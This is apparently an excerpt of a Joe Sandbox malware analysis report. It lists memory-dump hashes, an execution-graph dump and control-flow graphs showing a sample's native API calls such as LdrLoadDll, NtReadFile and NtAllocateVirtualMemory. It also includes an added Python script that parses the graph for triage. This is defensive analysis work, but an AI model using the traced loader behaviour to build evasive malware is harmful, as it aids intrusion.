                                      • Snapshot File: hcaresult_1_2_fbd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 066416c95fc4dd1d8c88456e7b13a7f1f5117ba82888a8bd293bc1efc10fdb77
                                      • Instruction ID: 7ae9af04a93669f8be47cd723df279f8b51882715bb8fc8bc0e106c29f14a1ba
                                      • Opcode Fuzzy Hash: 066416c95fc4dd1d8c88456e7b13a7f1f5117ba82888a8bd293bc1efc10fdb77
                                      • Instruction Fuzzy Hash: 0901DB724043409AE7105E1BCD84BE7BFA8DF41374F38C55AED094A286EA799844DF72
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251655322.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_fbd000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 01458252e5123650cc6d69dc5ecfa1241ff7a4c8c6d35ce6aaa1376612674c6e
                                      • Instruction ID: 0bba66240162282387eba2527eee754003d3250af25cb43bb4d170c28e941006
                                      • Opcode Fuzzy Hash: 01458252e5123650cc6d69dc5ecfa1241ff7a4c8c6d35ce6aaa1376612674c6e
                                      • Instruction Fuzzy Hash: 22F096754053449EEB148E1ACC84BA7FFA8EB91734F28C55AED084B286D7799C44CFB1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c010552654b153551acc73909388f0bec7be2ef671c263ae5f792de9b432d7af
                                      • Instruction ID: 4a2dcac4319335f0e556df6ce1bf0e384ba9e0098f113c15b5d2878a5028e083
                                      • Opcode Fuzzy Hash: c010552654b153551acc73909388f0bec7be2ef671c263ae5f792de9b432d7af
                                      • Instruction Fuzzy Hash: ECA18F32E0021A8FCF45DFB4C8405DFBBB2FF85304B1585AAE901AB261DB75E956CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:4.3%
                                      Dynamic/Decrypted Code Coverage:4.1%
                                      Signature Coverage:7.2%
                                      Total number of Nodes:556
                                      Total number of Limit Nodes:67
                                      execution_graph 32530 41f020 32533 41b960 32530->32533 32534 41b986 32533->32534 32541 409d30 32534->32541 32536 41b992 32537 41b9b3 32536->32537 32549 40c1b0 32536->32549 32539 41b9a5 32585 41a6a0 32539->32585 32588 409c80 32541->32588 32543 409d3d 32544 409d44 32543->32544 32600 409c20 32543->32600 32544->32536 32550 40c1d5 32549->32550 33011 40b1b0 32550->33011 32552 40c22c 33015 40ae30 32552->33015 32554 40c252 32584 40c4a3 32554->32584 33024 414390 32554->33024 32556 40c297 32556->32584 33027 408a60 32556->33027 32558 40c2db 32558->32584 33034 41a4f0 32558->33034 32562 40c331 32563 40c338 32562->32563 33046 41a000 32562->33046 32564 41bdb0 2 API calls 32563->32564 32566 40c345 32564->32566 32566->32539 32568 40c382 32569 41bdb0 2 API calls 32568->32569 32570 40c389 32569->32570 32570->32539 32571 40c392 32572 40f490 3 API calls 32571->32572 32573 40c406 32572->32573 32573->32563 32574 40c411 32573->32574 32575 41bdb0 2 API calls 32574->32575 32576 40c435 32575->32576 33051 41a050 32576->33051 32579 41a000 2 API calls 32580 40c470 32579->32580 32580->32584 33056 419e10 32580->33056 32583 41a6a0 2 API calls 32583->32584 32584->32539 32586 41a6bf ExitProcess 32585->32586 32587 41af50 LdrLoadDll 32585->32587 32587->32586 32619 418bb0 32588->32619 32592 409ca6 32592->32543 32593 409c9c 32593->32592 32626 41b2a0 32593->32626 32595 409ce3 32595->32592 32637 409aa0 32595->32637 32597 409d03 32643 409620 LdrLoadDll 32597->32643 32599 409d15 32599->32543 32601 409c3a 32600->32601 32602 41b590 LdrLoadDll 32600->32602 32986 41b590 32601->32986 32602->32601 32605 41b590 LdrLoadDll 32606 409c61 32605->32606 32607 40f170 32606->32607 32608 40f189 32607->32608 32994 40b030 32608->32994 32610 40f19c 32998 41a1d0 32610->32998 32614 40f1c2 32615 40f1ed 32614->32615 33004 41a250 32614->33004 32617 41a480 2 API calls 32615->32617 32618 409d55 32617->32618 32618->32536 32620 418bbf 32619->32620 32644 414e40 32620->32644 32622 409c93 32623 
418a60 32622->32623 32650 41a5f0 32623->32650 32627 41b2b9 32626->32627 32657 414a40 32627->32657 32629 41b2d1 32630 41b2da 32629->32630 32696 41b0e0 32629->32696 32630->32595 32632 41b2ee 32632->32630 32714 419ef0 32632->32714 32964 407ea0 32637->32964 32639 409ac1 32639->32597 32640 409aba 32640->32639 32977 408160 32640->32977 32643->32599 32645 414e5a 32644->32645 32646 414e4e 32644->32646 32645->32622 32646->32645 32649 4152c0 LdrLoadDll 32646->32649 32648 414fac 32648->32622 32649->32648 32653 41af50 32650->32653 32652 418a75 32652->32593 32654 41af60 32653->32654 32656 41af82 32653->32656 32655 414e40 LdrLoadDll 32654->32655 32655->32656 32656->32652 32658 414d75 32657->32658 32659 414a54 32657->32659 32658->32629 32659->32658 32722 419c40 32659->32722 32662 414b80 32725 41a350 32662->32725 32663 414b63 32782 41a450 LdrLoadDll 32663->32782 32666 414b6d 32666->32629 32667 414ba7 32668 41bdb0 2 API calls 32667->32668 32669 414bb3 32668->32669 32669->32666 32670 414d39 32669->32670 32672 414d4f 32669->32672 32676 414c42 32669->32676 32671 41a480 2 API calls 32670->32671 32673 414d40 32671->32673 32791 414780 LdrLoadDll NtReadFile NtClose 32672->32791 32673->32629 32675 414d62 32675->32629 32677 414ca9 32676->32677 32679 414c51 32676->32679 32677->32670 32678 414cbc 32677->32678 32784 41a2d0 32678->32784 32681 414c56 32679->32681 32682 414c6a 32679->32682 32783 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32681->32783 32685 414c87 32682->32685 32686 414c6f 32682->32686 32685->32673 32740 414400 32685->32740 32728 4146e0 32686->32728 32689 414c60 32689->32629 32690 414c7d 32690->32629 32692 414d1c 32788 41a480 32692->32788 32693 414c9f 32693->32629 32695 414d28 32695->32629 32697 41b0f1 32696->32697 32698 41b103 32697->32698 32809 41bd30 32697->32809 32698->32632 32700 41b124 32812 414060 32700->32812 32702 41b170 32702->32632 32703 41b147 32703->32702 32704 414060 3 API calls 32703->32704 32707 41b169 32704->32707 32706 41b1fa 32708 41b20a 
32706->32708 32931 41aef0 LdrLoadDll 32706->32931 32707->32702 32837 415380 32707->32837 32847 41ad60 32708->32847 32711 41b238 32926 419eb0 32711->32926 32715 419f0c 32714->32715 32716 41af50 LdrLoadDll 32714->32716 32958 17e2bca 32715->32958 32716->32715 32717 419f27 32719 41bdb0 32717->32719 32720 41b349 32719->32720 32961 41a660 32719->32961 32720->32595 32723 41af50 LdrLoadDll 32722->32723 32724 414b34 32723->32724 32724->32662 32724->32663 32724->32666 32726 41af50 LdrLoadDll 32725->32726 32727 41a36c NtCreateFile 32726->32727 32727->32667 32729 4146fc 32728->32729 32730 41a2d0 LdrLoadDll 32729->32730 32731 41471d 32730->32731 32732 414724 32731->32732 32733 414738 32731->32733 32735 41a480 2 API calls 32732->32735 32734 41a480 2 API calls 32733->32734 32736 414741 32734->32736 32737 41472d 32735->32737 32792 41bfc0 LdrLoadDll RtlAllocateHeap 32736->32792 32737->32690 32739 41474c 32739->32690 32741 41444b 32740->32741 32742 41447e 32740->32742 32744 41a2d0 LdrLoadDll 32741->32744 32743 4145c9 32742->32743 32748 41449a 32742->32748 32745 41a2d0 LdrLoadDll 32743->32745 32746 414466 32744->32746 32752 4145e4 32745->32752 32747 41a480 2 API calls 32746->32747 32749 41446f 32747->32749 32750 41a2d0 LdrLoadDll 32748->32750 32749->32693 32751 4144b5 32750->32751 32754 4144d1 32751->32754 32755 4144bc 32751->32755 32805 41a310 LdrLoadDll 32752->32805 32758 4144d6 32754->32758 32763 4144ec 32754->32763 32757 41a480 2 API calls 32755->32757 32756 41461e 32759 41a480 2 API calls 32756->32759 32760 4144c5 32757->32760 32761 41a480 2 API calls 32758->32761 32764 414629 32759->32764 32760->32693 32765 4144df 32761->32765 32762 4144f1 32769 414503 32762->32769 32796 41a400 32762->32796 32763->32762 32793 41bf80 32763->32793 32764->32693 32765->32693 32768 414557 32770 41456e 32768->32770 32804 41a290 LdrLoadDll 32768->32804 32769->32693 32771 414575 32770->32771 32772 41458a 32770->32772 32774 41a480 2 API calls 32771->32774 32775 41a480 2 API calls 32772->32775 
32774->32769 32776 414593 32775->32776 32777 4145bf 32776->32777 32799 41bb80 32776->32799 32777->32693 32779 4145aa 32780 41bdb0 2 API calls 32779->32780 32781 4145b3 32780->32781 32781->32693 32782->32666 32783->32689 32785 41af50 LdrLoadDll 32784->32785 32786 414d04 32784->32786 32785->32786 32787 41a310 LdrLoadDll 32786->32787 32787->32692 32789 41af50 LdrLoadDll 32788->32789 32790 41a49c NtClose 32789->32790 32790->32695 32791->32675 32792->32739 32795 41bf98 32793->32795 32806 41a620 32793->32806 32795->32762 32797 41a41c NtReadFile 32796->32797 32798 41af50 LdrLoadDll 32796->32798 32797->32768 32798->32797 32800 41bba4 32799->32800 32801 41bb8d 32799->32801 32800->32779 32801->32800 32802 41bf80 2 API calls 32801->32802 32803 41bbbb 32802->32803 32803->32779 32804->32770 32805->32756 32807 41af50 LdrLoadDll 32806->32807 32808 41a63c RtlAllocateHeap 32807->32808 32808->32795 32932 41a530 32809->32932 32811 41bd5d 32811->32700 32813 414071 32812->32813 32815 414079 32812->32815 32813->32703 32814 41434c 32814->32703 32815->32814 32935 41cf20 32815->32935 32817 4140cd 32818 41cf20 2 API calls 32817->32818 32821 4140d8 32818->32821 32819 414126 32822 41cf20 2 API calls 32819->32822 32821->32819 32940 41cfc0 32821->32940 32823 41413a 32822->32823 32824 41cf20 2 API calls 32823->32824 32826 4141ad 32824->32826 32825 41cf20 2 API calls 32833 4141f5 32825->32833 32826->32825 32828 414324 32947 41cf80 LdrLoadDll RtlFreeHeap 32828->32947 32830 41432e 32948 41cf80 LdrLoadDll RtlFreeHeap 32830->32948 32832 414338 32949 41cf80 LdrLoadDll RtlFreeHeap 32832->32949 32946 41cf80 LdrLoadDll RtlFreeHeap 32833->32946 32835 414342 32950 41cf80 LdrLoadDll RtlFreeHeap 32835->32950 32838 415391 32837->32838 32839 414a40 8 API calls 32838->32839 32840 4153a7 32839->32840 32841 4153e2 32840->32841 32842 4153f5 32840->32842 32846 4153fa 32840->32846 32843 41bdb0 2 API calls 32841->32843 32844 41bdb0 2 API calls 32842->32844 32845 4153e7 32843->32845 32844->32846 32845->32706 
32846->32706 32848 41ad74 32847->32848 32849 41ac20 LdrLoadDll 32847->32849 32951 41ac20 32848->32951 32849->32848 32851 41ad7d 32852 41ac20 LdrLoadDll 32851->32852 32853 41ad86 32852->32853 32854 41ac20 LdrLoadDll 32853->32854 32855 41ad8f 32854->32855 32856 41ac20 LdrLoadDll 32855->32856 32857 41ad98 32856->32857 32858 41ac20 LdrLoadDll 32857->32858 32859 41ada1 32858->32859 32860 41ac20 LdrLoadDll 32859->32860 32861 41adad 32860->32861 32862 41ac20 LdrLoadDll 32861->32862 32863 41adb6 32862->32863 32864 41ac20 LdrLoadDll 32863->32864 32865 41adbf 32864->32865 32866 41ac20 LdrLoadDll 32865->32866 32867 41adc8 32866->32867 32868 41ac20 LdrLoadDll 32867->32868 32869 41add1 32868->32869 32870 41ac20 LdrLoadDll 32869->32870 32871 41adda 32870->32871 32872 41ac20 LdrLoadDll 32871->32872 32873 41ade6 32872->32873 32874 41ac20 LdrLoadDll 32873->32874 32875 41adef 32874->32875 32876 41ac20 LdrLoadDll 32875->32876 32877 41adf8 32876->32877 32878 41ac20 LdrLoadDll 32877->32878 32879 41ae01 32878->32879 32880 41ac20 LdrLoadDll 32879->32880 32881 41ae0a 32880->32881 32882 41ac20 LdrLoadDll 32881->32882 32883 41ae13 32882->32883 32884 41ac20 LdrLoadDll 32883->32884 32885 41ae1f 32884->32885 32886 41ac20 LdrLoadDll 32885->32886 32887 41ae28 32886->32887 32888 41ac20 LdrLoadDll 32887->32888 32889 41ae31 32888->32889 32890 41ac20 LdrLoadDll 32889->32890 32891 41ae3a 32890->32891 32892 41ac20 LdrLoadDll 32891->32892 32893 41ae43 32892->32893 32894 41ac20 LdrLoadDll 32893->32894 32895 41ae4c 32894->32895 32896 41ac20 LdrLoadDll 32895->32896 32897 41ae58 32896->32897 32898 41ac20 LdrLoadDll 32897->32898 32899 41ae61 32898->32899 32900 41ac20 LdrLoadDll 32899->32900 32901 41ae6a 32900->32901 32902 41ac20 LdrLoadDll 32901->32902 32903 41ae73 32902->32903 32904 41ac20 LdrLoadDll 32903->32904 32905 41ae7c 32904->32905 32906 41ac20 LdrLoadDll 32905->32906 32907 41ae85 32906->32907 32908 41ac20 LdrLoadDll 32907->32908 32909 41ae91 32908->32909 32910 41ac20 LdrLoadDll 32909->32910 32911 
41ae9a 32910->32911 32912 41ac20 LdrLoadDll 32911->32912 32913 41aea3 32912->32913 32914 41ac20 LdrLoadDll 32913->32914 32915 41aeac 32914->32915 32916 41ac20 LdrLoadDll 32915->32916 32917 41aeb5 32916->32917 32918 41ac20 LdrLoadDll 32917->32918 32919 41aebe 32918->32919 32920 41ac20 LdrLoadDll 32919->32920 32921 41aeca 32920->32921 32922 41ac20 LdrLoadDll 32921->32922 32923 41aed3 32922->32923 32924 41ac20 LdrLoadDll 32923->32924 32925 41aedc 32924->32925 32925->32711 32927 41af50 LdrLoadDll 32926->32927 32928 419ecc 32927->32928 32929 419ee3 32928->32929 32957 17e2db0 LdrInitializeThunk 32928->32957 32929->32632 32931->32708 32933 41af50 LdrLoadDll 32932->32933 32934 41a54c NtAllocateVirtualMemory 32933->32934 32934->32811 32936 41cf30 32935->32936 32937 41cf36 32935->32937 32936->32817 32938 41bf80 2 API calls 32937->32938 32939 41cf5c 32938->32939 32939->32817 32941 41cfe5 32940->32941 32942 41d01d 32940->32942 32943 41bf80 2 API calls 32941->32943 32942->32821 32944 41cffa 32943->32944 32945 41bdb0 2 API calls 32944->32945 32945->32942 32946->32828 32947->32830 32948->32832 32949->32835 32950->32814 32952 41ac3b 32951->32952 32953 414e40 LdrLoadDll 32952->32953 32954 41ac5b 32953->32954 32955 414e40 LdrLoadDll 32954->32955 32956 41ad07 32954->32956 32955->32956 32956->32851 32956->32956 32957->32929 32959 17e2bdf LdrInitializeThunk 32958->32959 32960 17e2bd1 32958->32960 32959->32717 32960->32717 32962 41a67c RtlFreeHeap 32961->32962 32963 41af50 LdrLoadDll 32961->32963 32962->32720 32963->32962 32965 407eb0 32964->32965 32966 407eab 32964->32966 32967 41bd30 2 API calls 32965->32967 32966->32640 32973 407ed5 32967->32973 32968 407f38 32968->32640 32969 419eb0 2 API calls 32969->32973 32970 407f3e 32971 407f64 32970->32971 32974 41a5b0 2 API calls 32970->32974 32971->32640 32973->32968 32973->32969 32973->32970 32975 41bd30 2 API calls 32973->32975 32980 41a5b0 32973->32980 32976 407f55 32974->32976 32975->32973 32976->32640 32978 40817e 32977->32978 32979 
41a5b0 2 API calls 32977->32979 32978->32597 32979->32978 32981 41af50 LdrLoadDll 32980->32981 32982 41a5cc 32981->32982 32985 17e2c30 LdrInitializeThunk 32982->32985 32983 41a5e3 32983->32973 32985->32983 32987 41b5b3 32986->32987 32990 40ace0 32987->32990 32991 40aced 32990->32991 32992 40ad40 LdrLoadDll 32991->32992 32993 409c4b 32991->32993 32992->32993 32993->32605 32995 40b053 32994->32995 32995->32995 32997 40b0d0 32995->32997 33009 419c80 LdrLoadDll 32995->33009 32997->32610 32999 41af50 LdrLoadDll 32998->32999 33000 40f1ab 32999->33000 33000->32618 33001 41a7c0 33000->33001 33002 41af50 LdrLoadDll 33001->33002 33003 41a7df LookupPrivilegeValueW 33002->33003 33003->32614 33005 41af50 LdrLoadDll 33004->33005 33006 41a26c 33005->33006 33010 17e2e60 LdrInitializeThunk 33006->33010 33007 41a28b 33007->32615 33009->32997 33010->33007 33012 40b1e0 33011->33012 33013 40b030 LdrLoadDll 33012->33013 33014 40b1f4 33013->33014 33014->32552 33016 40ae3d 33015->33016 33017 40ae41 33015->33017 33016->32554 33018 40ae5a 33017->33018 33019 40ae8c 33017->33019 33061 419cc0 LdrLoadDll 33018->33061 33062 419cc0 LdrLoadDll 33019->33062 33021 40ae9d 33021->32554 33023 40ae7c 33023->32554 33025 40f490 3 API calls 33024->33025 33026 4143b6 33025->33026 33026->32556 33063 4087a0 33027->33063 33029 408a9d 33029->32558 33031 4087a0 19 API calls 33032 408a8a 33031->33032 33032->33029 33081 40f700 10 API calls 33032->33081 33035 41af50 LdrLoadDll 33034->33035 33036 41a50c 33035->33036 33200 17e2e40 LdrInitializeThunk 33036->33200 33037 40c312 33039 40f490 33037->33039 33040 40f4ad 33039->33040 33201 419fb0 33040->33201 33043 40f4f5 33043->32562 33044 41a000 2 API calls 33045 40f51e 33044->33045 33045->32562 33047 41af50 LdrLoadDll 33046->33047 33048 41a01c 33047->33048 33207 17e2cd0 LdrInitializeThunk 33048->33207 33049 40c375 33049->32568 33049->32571 33052 41af50 LdrLoadDll 33051->33052 33053 41a06c 33052->33053 33208 17e2cf0 LdrInitializeThunk 33053->33208 33054 40c449 33054->32579 
33057 41af50 LdrLoadDll 33056->33057 33058 419e2c 33057->33058 33209 17e2f70 LdrInitializeThunk 33058->33209 33059 40c49c 33059->32583 33061->33023 33062->33021 33064 407ea0 4 API calls 33063->33064 33079 4087ba 33064->33079 33065 408a3f 33066 408160 2 API calls 33065->33066 33068 408a49 33066->33068 33068->33029 33068->33031 33070 419ef0 2 API calls 33070->33079 33072 41a480 LdrLoadDll NtClose 33072->33079 33075 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 33075->33079 33078 419e10 2 API calls 33078->33079 33079->33065 33079->33068 33079->33070 33079->33072 33079->33075 33079->33078 33082 419d00 33079->33082 33085 4085d0 33079->33085 33097 40f5e0 LdrLoadDll NtClose 33079->33097 33098 419d80 LdrLoadDll 33079->33098 33099 419db0 LdrLoadDll 33079->33099 33100 419e40 LdrLoadDll 33079->33100 33101 4083a0 33079->33101 33117 405f60 LdrLoadDll 33079->33117 33081->33029 33083 41af50 LdrLoadDll 33082->33083 33084 419d1c 33083->33084 33084->33079 33086 4085e6 33085->33086 33118 419870 33086->33118 33088 4085ff 33089 408771 33088->33089 33139 4081a0 33088->33139 33089->33079 33091 4086e5 33091->33089 33092 4083a0 11 API calls 33091->33092 33093 408713 33092->33093 33093->33089 33094 419ef0 2 API calls 33093->33094 33095 408748 33094->33095 33095->33089 33096 41a4f0 2 API calls 33095->33096 33096->33089 33097->33079 33098->33079 33099->33079 33100->33079 33102 4083c9 33101->33102 33179 408310 33102->33179 33105 41a4f0 2 API calls 33106 4083dc 33105->33106 33106->33105 33107 408467 33106->33107 33110 408462 33106->33110 33187 40f660 33106->33187 33107->33079 33108 41a480 2 API calls 33109 40849a 33108->33109 33109->33107 33111 419d00 LdrLoadDll 33109->33111 33110->33108 33112 4084ff 33111->33112 33112->33107 33191 419d40 33112->33191 33114 408563 33114->33107 33115 414a40 8 API calls 33114->33115 33116 4085b8 33115->33116 33116->33079 33117->33079 33119 41bf80 2 API calls 33118->33119 33120 419887 33119->33120 33146 409310 33120->33146 
33122 4198a2 33123 4198e0 33122->33123 33124 4198c9 33122->33124 33127 41bd30 2 API calls 33123->33127 33125 41bdb0 2 API calls 33124->33125 33126 4198d6 33125->33126 33126->33088 33128 41991a 33127->33128 33129 41bd30 2 API calls 33128->33129 33130 419933 33129->33130 33136 419bd4 33130->33136 33152 41bd70 33130->33152 33133 419bc0 33134 41bdb0 2 API calls 33133->33134 33135 419bca 33134->33135 33135->33088 33137 41bdb0 2 API calls 33136->33137 33138 419c29 33137->33138 33138->33088 33140 40829f 33139->33140 33141 4081b5 33139->33141 33140->33091 33141->33140 33142 414a40 8 API calls 33141->33142 33143 408222 33142->33143 33144 41bdb0 2 API calls 33143->33144 33145 408249 33143->33145 33144->33145 33145->33091 33147 409335 33146->33147 33148 40ace0 LdrLoadDll 33147->33148 33149 409368 33148->33149 33151 40938d 33149->33151 33155 40cf10 33149->33155 33151->33122 33173 41a570 33152->33173 33156 40cf3c 33155->33156 33157 41a1d0 LdrLoadDll 33156->33157 33158 40cf55 33157->33158 33159 40cf5c 33158->33159 33166 41a210 33158->33166 33159->33151 33163 40cf97 33164 41a480 2 API calls 33163->33164 33165 40cfba 33164->33165 33165->33151 33167 41a22c 33166->33167 33168 41af50 LdrLoadDll 33166->33168 33172 17e2c60 LdrInitializeThunk 33167->33172 33168->33167 33169 40cf7f 33169->33159 33171 41a800 LdrLoadDll 33169->33171 33171->33163 33172->33169 33174 41af50 LdrLoadDll 33173->33174 33175 41a58c 33174->33175 33178 17e2f50 LdrInitializeThunk 33175->33178 33176 419bb9 33176->33133 33176->33136 33178->33176 33180 408328 33179->33180 33181 40ace0 LdrLoadDll 33180->33181 33182 408343 33181->33182 33183 414e40 LdrLoadDll 33182->33183 33184 408353 33183->33184 33185 40835c PostThreadMessageW 33184->33185 33186 408370 33184->33186 33185->33186 33186->33106 33188 40f673 33187->33188 33194 419e80 33188->33194 33192 41af50 LdrLoadDll 33191->33192 33193 419d5c 33192->33193 33193->33114 33195 419e9c 33194->33195 33196 41af50 LdrLoadDll 33194->33196 33199 17e2d90 LdrInitializeThunk 
33195->33199 33196->33195 33197 40f69e 33197->33106 33199->33197 33200->33037 33202 419fcc 33201->33202 33203 41af50 LdrLoadDll 33201->33203 33206 17e2ef0 LdrInitializeThunk 33202->33206 33203->33202 33204 40f4ee 33204->33043 33204->33044 33206->33204 33207->33049 33208->33054 33209->33059 33210 17de244 33212 17de279 33210->33212 33211 17de28d GetPEB 33213 17de2a1 33211->33213 33212->33211 33214 17de3b0 33212->33214 33213->33214 33218 17e2a90 LdrInitializeThunk 33213->33218 33216 17de39e GetPEB 33216->33214 33217 17de2c8 33217->33216 33218->33217 33219 17e2b20 LdrInitializeThunk
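The execution_graph dump above is a flat token stream: a five-digit node id, the hex address of the basic block it stands for, any API names the block reaches, and `src->dst` edges. As an added example (not Joe Sandbox code), the parser below turns such a stream into nodes and edges and then answers the triage questions a reverser actually asks of it: which blocks call native APIs, how often each API appears, and which blocks lead to a given call site. The token grammar is inferred from the dump on this page; `GRAPH_EXCERPT` is a constructed excerpt copied from that dump, and edges to nodes outside the excerpt are kept but resolve to no address.

```python
"""Parse a Joe Sandbox execution_graph token dump into nodes and edges and
pull out the native-API call sites.

Added example, not Joe Sandbox code. Grammar assumed from the dump on the
page: '<5-digit id> <hex addr> [label words...]' defines a node, 'a->b' is an
edge, anything else before the first node (e.g. 'execution_graph') is noise.
"""
import re
from collections import Counter, defaultdict

# Constructed excerpt: tokens copied verbatim from the page's execution_graph.
GRAPH_EXCERPT = (
    "execution_graph 32530 41f020 32533 41b960 32530->32533 32534 41b986 "
    "32533->32534 32541 409d30 32534->32541 32536 41b992 32537 41b9b3 "
    "32536->32537 32549 40c1b0 32536->32549 32539 41b9a5 32585 41a6a0 "
    "32539->32585 32586 41a6bf ExitProcess 32585->32586 32587 41af50 LdrLoadDll "
    "32585->32587 32587->32586 32725 41a350 32662->32725 32726 41af50 LdrLoadDll "
    "32725->32726 32727 41a36c NtCreateFile 32726->32727 32727->32667 "
    "32796 41a400 32762->32796 32797 41a41c NtReadFile 32796->32797 "
    "32798 41af50 LdrLoadDll 32796->32798 32797->32768 32798->32797 "
    "32788 41a480 32692->32788 32789 41af50 LdrLoadDll 32788->32789 "
    "32790 41a49c NtClose 32789->32790 32790->32695 32932 41a530 32809->32932 "
    "32933 41af50 LdrLoadDll 32932->32933 32934 41a54c NtAllocateVirtualMemory "
    "32933->32934 32934->32811 33075 40c4b0 LdrLoadDll NtClose "
    "LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 33075->33079"
)

NODE_ID = re.compile(r"^\d{5}$")
HEX_ADDR = re.compile(r"^[0-9a-f]{4,8}$")
EDGE = re.compile(r"^(\d{5})->(\d{5})$")
API_NAME = re.compile(r"^[A-Z][A-Za-z]{2,}$")   # NtReadFile, LdrLoadDll, GetPEB


def parse_execution_graph(text):
    """Return (nodes, edges). nodes: id -> {'addr': str, 'labels': [str]};
    edges: list of (src_id, dst_id). Label words such as '2 API calls' are
    attached to the node that precedes them."""
    nodes, edges = {}, []
    tokens = text.split()
    current, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.append((m.group(1), m.group(2)))
            i += 1
            continue
        if NODE_ID.match(tok) and i + 1 < len(tokens) and HEX_ADDR.match(tokens[i + 1]):
            current = tok
            nodes[current] = {"addr": tokens[i + 1], "labels": []}
            i += 2
            continue
        if current is not None:          # a label word for the current node
            nodes[current]["labels"].append(tok)
        i += 1
    return nodes, edges


def native_api_sites(nodes):
    """Sorted (address, API) pairs for every node labelled with an API name.
    The word 'API' from '2 API calls' summaries is not an API name."""
    return sorted(
        (n["addr"], lab)
        for n in nodes.values()
        for lab in n["labels"]
        if API_NAME.match(lab) and lab != "API"
    )


def api_histogram(nodes):
    """How often each API name occurs across the graph (LdrLoadDll dominates
    in this sample: imports are resolved at run time, block by block)."""
    return Counter(lab for _, lab in native_api_sites(nodes))


def callers_of(api, nodes, edges):
    """Addresses of every node from which a block calling `api` is reachable,
    found by walking the edge list backwards from each call site."""
    preds = defaultdict(set)
    for src, dst in edges:
        preds[dst].add(src)
    stack = [nid for nid, n in nodes.items() if api in n["labels"]]
    seen = set()
    while stack:
        for p in preds[stack.pop()]:
            if p not in seen:
                seen.add(p)
                stack.append(p)
    return {nodes[p]["addr"] for p in seen if p in nodes}


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(GRAPH_EXCERPT)
    for addr, api in native_api_sites(nodes):
        print(f"{addr}: {api}")
    print(api_histogram(nodes).most_common(3))
    print("reaches NtReadFile:", sorted(callers_of("NtReadFile", nodes, edges)))
```

Run it against the full dump on this page rather than the excerpt to see the pattern that matters here: nearly every API block is preceded by a `41af50 LdrLoadDll` stub, i.e. the file I/O (`NtCreateFile`, `NtReadFile`, `NtClose`) and the `NtAllocateVirtualMemory` call are reached through run-time import resolution rather than a static import table.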

                                      Control-flow Graph

                                      control_flow_graph 0 41a3fb-41a449 call 41af50 NtReadFile
                                      APIs
                                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: !JA$bMA$bMA
                                      • API String ID: 2738559852-4222312340
                                      • Opcode ID: c58304c0b49f89483d4a5a8e6b6bc43ea95b844e4a7018bf86d7e09192205194
                                      • Instruction ID: fe50c8e70b6a7bb14c1200939d44c8377b68028b2ee7de99e58e179fc264bef5
                                      • Opcode Fuzzy Hash: c58304c0b49f89483d4a5a8e6b6bc43ea95b844e4a7018bf86d7e09192205194
                                      • Instruction Fuzzy Hash: 70F017B6200108AFDB14CF99CC80EEB77A9FF8C714F158649BA1DE7240D630E811CBA0

                                      Control-flow Graph (rendered graph omitted): control_flow_graph 4 41a400-41a416 5 41a41c-41a449 NtReadFile 4->5 6 41a417 call 41af50 4->6 6->5
                                      APIs
                                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: !JA$bMA$bMA
                                      • API String ID: 2738559852-4222312340
                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

                                      Control-flow Graph (rendered graph omitted): control_flow_graph 7 41a3a2-41a3a7 8 41a3a9 7->8 9 41a40d-41a414 7->9 8->9 10 41a41c-41a449 NtReadFile 9->10 11 41a417 call 41af50 9->11 11->10
                                      APIs
                                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Similarity
